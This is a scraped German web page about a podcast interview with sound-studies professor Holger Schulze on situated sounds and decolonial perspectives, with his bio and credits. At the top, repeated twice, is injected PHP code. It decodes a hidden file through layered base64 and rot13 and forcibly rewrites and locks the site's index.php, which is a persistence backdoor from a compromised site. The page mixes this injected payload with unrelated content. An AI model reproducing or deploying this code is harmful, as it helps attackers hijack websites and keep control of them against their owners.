$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Situative Klänge und dekoloniale Perspektiven – Auditive Medienkulturen

Situative Klänge und dekoloniale Perspektiven

Ania Mauruschat im Gespräch mit Holger Schulze, Professor für Sound Studies an der Universität Kopenhagen sowie Gründer und Leiter des Sound Studies Lab

Holger Schulze

Holger Schulze ist seit 2014 ist er Professor für Musikologie mit Lehrstuhl für Sound Studies an der Universität Kopenhagen. Er promovierte 1998 mit einer komparatistischen Arbeit zur Literatur-, Musik- und Kunstgeschichte der Aleatorik und habilitierte sich 2007 mit einer Untersuchung zum Verhältnis von Intimität und Medialität. Von 2010 bis 2016 leitete Schulze das internationale DFG-Netzwerk “Sound in Media Culture“ und von 2011 bis 2017 war er Leiter des DFG-Projektes „Funktionale Klänge“ an dem von ihm gegründeten Sound Studies Lab.

Die Hintergründe des Podcast erklären wie hier.

Das Gespräch mit Holger Schulze inkl. sämtlicher Links und Literaturangaben gibt es auch als Magazin-Beitrag.

Wir freuen uns über Fragen, Anregungen & Feedback per Mail an: auditive.medienkulturen@gmail.com

Shownotes:

Website von Holger Schulze an der Universität Kopenhagen.

Website des Sound Studies Lab.

Credits

Interview: Ania Mauruschat

Schnitt & Mischung: Leon Fiedler

Sounddesign: Matthias Roeckl & Rainer Schaller (rainer@slut-music.com)